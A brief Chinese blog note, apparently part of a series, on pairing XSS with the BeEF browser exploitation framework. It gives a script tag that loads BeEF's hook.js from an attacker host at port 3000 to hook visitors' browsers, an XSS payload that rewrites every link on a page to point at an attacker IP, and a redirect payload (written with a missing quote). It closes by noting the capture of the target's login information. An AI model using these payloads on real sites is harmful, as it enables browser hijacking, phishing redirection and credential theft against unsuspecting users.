xss与beef

启动beef和apache

xss与beef

修改主页,在网页中添加

<script src='http://IP:3000/hook.js'></script>

 

xss漏洞利用

篡改网页a标签中的连接

<script>
window.onload = function(){
var link = document.getElementsByTagName("a");
for(j = 0; j < link.length; j++){
link[j].href = "http://IP";}
}
</script>

跳转到目标网页

<script>window.location='http://ip</script>

 

目标登录网页获取信息

xss与beef

 

上一篇:浏览器渗透框架BeEF使用笔记(二)


下一篇:kali linux 中实现beef和msf关联出现问题解决